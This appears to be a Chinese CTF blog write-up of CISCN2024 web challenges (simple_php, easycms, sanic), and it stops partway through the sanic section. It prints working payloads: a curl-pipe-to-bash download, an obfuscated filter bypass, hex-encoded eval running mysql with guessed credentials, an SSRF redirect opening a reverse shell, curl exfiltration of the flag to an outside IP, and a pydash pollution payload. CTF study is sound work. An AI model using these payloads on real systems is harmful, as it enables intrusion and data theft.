<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="0x01当时只做出了签到的php(bushi)，现在来看看 0x02 questionsimple_php12345678910111213&lt;?phpini_set(&#x27;open_basedir&#x27;, &#x27;&#x2F;var&#x2F;www&#x2F;html&#x2F;&#x27;);error_reporting(0);if(isset($_POST[&#x27;cmd&#x27;]))&#123;">
<meta property="og:type" content="article">
<meta property="og:title" content="CISCN2024">
<meta property="og:url" content="https://baozongwi.xyz/2024/12/12/CISCN2024/index.html">
<meta property="og:site_name" content="baozongwi:H@cking Th3 Fu1ure">
<meta property="og:description" content="0x01当时只做出了签到的php(bushi)，现在来看看 0x02 questionsimple_php12345678910111213&lt;?phpini_set(&#x27;open_basedir&#x27;, &#x27;&#x2F;var&#x2F;www&#x2F;html&#x2F;&#x27;);error_reporting(0);if(isset($_POST[&#x27;cmd&#x27;]))&#123;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-202127.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-203621.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-204438.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-205159.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-211317.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-214056.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-214445.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-214718.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-215202.jpg">
<meta property="og:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250225-153353.jpg">
<meta property="article:published_time" content="2024-12-12T06:20:33.000Z">
<meta property="article:modified_time" content="2025-04-19T06:27:59.734Z">
<meta property="article:author" content="baozongwi">
<meta property="article:tag" content="php">
<meta property="article:tag" content="ssrf">
<meta property="article:tag" content="jail">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://baozongwi.xyz/images/achieve/2025/2/CISCN2024/QQ20250224-202127.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>CISCN2024</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="baozongwi:H@cking Th3 Fu1ure" type="application/atom+xml" />
    
	<!-- mathjax -->
	
	<!-- Waline Comments -->
	
		<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css"/>
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">H0me</a></li><!--
     --><!--
       --><li><a href="/about/">Aβout</a></li><!--
     --><!--
       --><li><a href="/tags/">Topi3s</a></li><!--
     --><!--
       --><li><a href="/categories/">Cat4gory</a></li><!--
     --><!--
       --><li><a href="/links/">Li^ks</a></li><!--
     --><!--
       --><li><a href="/search/">Seαrch</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/12/12/ctfshowAK%E8%B5%9B/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/12/11/ctfshow36D%E7%BB%83%E6%89%8B%E8%B5%9B/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://baozongwi.xyz/2024/12/12/CISCN2024/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&text=CISCN2024"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&is_video=false&description=CISCN2024"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CISCN2024&body=Check out this article: https://baozongwi.xyz/2024/12/12/CISCN2024/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&title=CISCN2024"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://baozongwi.xyz/2024/12/12/CISCN2024/&name=CISCN2024&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://baozongwi.xyz/2024/12/12/CISCN2024/&t=CISCN2024"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01"><span class="toc-number">1.</span> <span class="toc-text">0x01</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-question"><span class="toc-number">2.</span> <span class="toc-text">0x02 question</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#simple-php"><span class="toc-number">2.1.</span> <span class="toc-text">simple_php</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#easycms"><span class="toc-number">2.2.</span> <span class="toc-text">easycms</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sanic"><span class="toc-number">2.3.</span> <span class="toc-text">sanic</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mossfern"><span class="toc-number">2.4.</span> <span class="toc-text">mossfern</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        CISCN2024
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">baozongwi</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-12-12T06:20:33.000Z" class="dt-published" itemprop="datePublished">2024-12-12</time>
        
        (Updated: <time datetime="2025-04-19T06:27:59.734Z" class="dt-updated" itemprop="dateModified">2025-04-19</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/ctfshow/">ctfshow</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/jail/" rel="tag">jail</a>, <a class="p-category" href="/tags/php/" rel="tag">php</a>, <a class="p-category" href="/tags/ssrf/" rel="tag">ssrf</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h1><p>当时只做出了签到的php(bushi)，现在来看看</p>
<h1 id="0x02-question"><a href="#0x02-question" class="headerlink" title="0x02 question"></a>0x02 question</h1><h2 id="simple-php"><a href="#simple-php" class="headerlink" title="simple_php"></a>simple_php</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;open_basedir&#x27;</span>, <span class="string">&#x27;/var/www/html/&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$cmd</span> = <span class="title function_ invoke__">escapeshellcmd</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]); </span><br><span class="line">     <span class="keyword">if</span> (!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|&#123;|&#125;|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\&#x27;|\&quot;|id|whoami/i&#x27;</span>, <span class="variable">$cmd</span>)) &#123;</span><br><span class="line">         <span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接就可以弹shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://156.238.233.9/shell.sh|bash</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd=eval `ec\ho Y3VybCBo\dHRwOi8vMTU2LjIzOC4yMzMuOS9zaGVsbC5zaHxiYXNo|base\64 -d|s\h`</span><br></pre></td></tr></table></figure>

<p>本地通了但是ctfshow没成功，和<strong>大菜鸡</strong>师傅问了一下，原来是靶机没有bash，那么直接截断绕过其实也可以</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>93186233-bb78-435b-812e-67634ca5218e.challenge.ctf.show</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>6</span><br><span class="line"><span class="attribute">Pragma</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">sec-ch-ua</span><span class="punctuation">: </span>&quot;Google Chrome&quot;;v=&quot;131&quot;, &quot;Chromium&quot;;v=&quot;131&quot;, &quot;Not_A Brand&quot;;v=&quot;24&quot;</span><br><span class="line"><span class="attribute">sec-ch-ua-mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">sec-ch-ua-platform</span><span class="punctuation">: </span>&quot;Windows&quot;</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>https://93186233-bb78-435b-812e-67634ca5218e.challenge.ctf.show</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>same-origin</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Referer</span><span class="punctuation">: </span>https://93186233-bb78-435b-812e-67634ca5218e.challenge.ctf.show/</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br, zstd</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line"></span><br><span class="line"><span class="language-dockerfile"><span class="keyword">cmd</span><span class="language-bash">=ca%0at+/etc/passwd</span></span></span><br></pre></td></tr></table></figure>

<p>发现有mysql，再看看进程，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd=p%0as+-ef</span><br></pre></td></tr></table></figure>

<p>可以进数据库看看，什么情况，直接猜弱密码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -uroot -proot -e &#x27;show databases;&#x27;</span><br></pre></td></tr></table></figure>

<p>但是截断的这种打不了了，只能换了，还可以利用十六进制打，记得自己之前刷题的时候有做过，当时看着狗哥博客做的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">php -r &quot;phpinfo();&quot;</span><br><span class="line"># 但是这个远程不行</span><br><span class="line">php -r eval(hex2bin(substr(_xxxxxx,1)));</span><br><span class="line"></span><br><span class="line">echo `mysql -u root -p&#x27;root&#x27; -e &#x27;show databases;&#x27;`;</span><br><span class="line">cmd=php+-r+eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));</span><br><span class="line"></span><br><span class="line">echo `mysql -u root -p&#x27;root&#x27; -e &#x27;use PHP_CMS;show tables;&#x27;`;</span><br><span class="line">cmd=php+-r+eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b27603b,1)));</span><br><span class="line"></span><br><span class="line">echo `mysql -u root -p&#x27;root&#x27; -e &#x27;use PHP_CMS;select * from F1ag_Se3Re7&#x27;`;</span><br><span class="line">cmd=php+-r+eval(hex2bin(substr(_6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73656c656374202a2066726f6d20463161675f53653352653727603b,1)));</span><br></pre></td></tr></table></figure>

<h2 id="easycms"><a href="#easycms" class="headerlink" title="easycms"></a>easycms</h2><p>打一个ssrf，302跳转打</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;location:http://127.0.0.1/flag.php?cmd=bash%20-c%20&#x27;bash%20-i%20&gt;&amp;%20/dev/tcp/156.238.233.9/4444%20&lt;&amp;1&#x27;&quot;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是还是不能弹shell，我们换成执行命令的就可以了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">header</span>(<span class="string">&quot;location:http://127.0.0.1/flag.php?cmd=curl http://156.238.233.9/a=`/readflag`&quot;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?s=api&amp;c=api&amp;m=qrcode&amp;text=1&amp;thumb=http://a.baozongwi.xyz/b.php</span><br></pre></td></tr></table></figure>

<h2 id="sanic"><a href="#sanic" class="headerlink" title="sanic"></a>sanic</h2><p>这道题质量非常高，我什么时候能一样出这么好的题呢</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> sanic <span class="keyword">import</span> Sanic</span><br><span class="line"><span class="keyword">from</span> sanic.response <span class="keyword">import</span> text, html</span><br><span class="line"><span class="keyword">from</span> sanic_session <span class="keyword">import</span> Session</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"><span class="comment"># pydash==5.1.2</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Sanic(__name__)</span><br><span class="line">app.static(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line">Session(app)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">index</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> html(<span class="built_in">open</span>(<span class="string">&#x27;static/index.html&#x27;</span>).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/login&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">login</span>(<span class="params">request</span>):</span><br><span class="line">    user = request.cookies.get(<span class="string">&quot;user&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> user.lower() == <span class="string">&#x27;adm;n&#x27;</span>:</span><br><span class="line">        request.ctx.session[<span class="string">&#x27;admin&#x27;</span>] = <span class="literal">True</span></span><br><span class="line">        <span class="keyword">return</span> text(<span class="string">&quot;login success&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> text(<span class="string">&quot;login fail&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/src&quot;</span></span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">src</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">return</span> text(<span class="built_in">open</span>(__file__).read())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">def</span> <span class="title function_">admin</span>(<span class="params">request</span>):</span><br><span class="line">    <span class="keyword">if</span> request.ctx.session.get(<span class="string">&#x27;admin&#x27;</span>) == <span class="literal">True</span>:</span><br><span class="line">        key = request.json[<span class="string">&#x27;key&#x27;</span>]</span><br><span class="line">        value = request.json[<span class="string">&#x27;value&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) <span class="keyword">is</span> <span class="built_in">str</span> <span class="keyword">and</span> <span class="string">&#x27;_.&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> key:</span><br><span class="line">            pollute = Pollute()</span><br><span class="line">            pydash.set_(pollute, key, value)</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> text(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>首先就是<code>/login</code>路由的身份验证，但是因为是从cookie处获取，默认是<code>;</code>就给截断了，但是由于是python解析，我们可以使用进制绕过</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">GET</span> <span class="string">/login</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>7e1d7bbf-ce2e-4af9-9132-1ff5afe3a9c9.challenge.ctf.show</span><br><span class="line"><span class="attribute">Connection</span><span class="punctuation">: </span>keep-alive</span><br><span class="line"><span class="attribute">Pragma</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">Cache-Control</span><span class="punctuation">: </span>no-cache</span><br><span class="line"><span class="attribute">sec-ch-ua</span><span class="punctuation">: </span>&quot;Not A(Brand&quot;;v=&quot;8&quot;, &quot;Chromium&quot;;v=&quot;132&quot;, &quot;Google Chrome&quot;;v=&quot;132&quot;</span><br><span class="line"><span class="attribute">sec-ch-ua-mobile</span><span class="punctuation">: </span>?0</span><br><span class="line"><span class="attribute">sec-ch-ua-platform</span><span class="punctuation">: </span>&quot;Windows&quot;</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span><span class="punctuation">: </span>1</span><br><span class="line"><span class="attribute">User-Agent</span><span class="punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36</span><br><span class="line"><span class="attribute">Accept</span><span class="punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</span><br><span class="line"><span class="attribute">Sec-Fetch-Site</span><span class="punctuation">: </span>none</span><br><span class="line"><span class="attribute">Sec-Fetch-Mode</span><span class="punctuation">: </span>navigate</span><br><span class="line"><span class="attribute">Sec-Fetch-Dest</span><span class="punctuation">: </span>document</span><br><span class="line"><span class="attribute">Accept-Encoding</span><span class="punctuation">: </span>gzip, deflate, br, zstd</span><br><span class="line"><span class="attribute">Accept-Language</span><span class="punctuation">: </span>zh-CN,zh;q=0.9,en;q=0.8</span><br><span class="line"><span class="attribute">Cookie</span><span class="punctuation">: </span>user=&quot;adm\073n&quot;</span><br><span class="line"><span class="attribute">sec-fetch-user</span><span class="punctuation">: </span>?1</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>看到<code>/src</code>这里是使用的<code>open(__file__).read()</code>，也就是说如果我们能够污染或者说可控<code>__file__</code>就可以实现任意文件读取，看到<code>/admin</code></p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-202127.jpg" alt="1"></p>
<p>发现使用了pydash，并且版本正确可以进行原型链污染，只不过这里需要绕过一下<code>_.</code>，这个绕过用<code>\</code>转义就可以绕过了，我们换上session就可以进行污染的尝试了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">44755604126b4cbe977d27e6616427e1</span><br></pre></td></tr></table></figure>

<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span><span class="attr">&quot;key&quot;</span><span class="punctuation">:</span><span class="string">&quot;.__init__\\\\.__globals__\\\\.__file__&quot;</span><span class="punctuation">,</span><span class="attr">&quot;value&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/etc/passwd&quot;</span><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>

<p>访问<code>/src</code>发现成功污染了，接着污染<code>/flag</code>，发现不对，可能是因为flag的名字并未是这个？也就是说我们必须要有个东西能够列出根目录的文件，才能够污染拿到flag，但是怎么找呢，由于这个代码非常简短所以很容易就引导我们去<code>app</code>应用查找</p>
<p><img src="/../images/achieve/2025/2/CISCN2024/QQ20250224-203621.jpg" alt="1"></p>
<p>跟进<code>static</code></p>
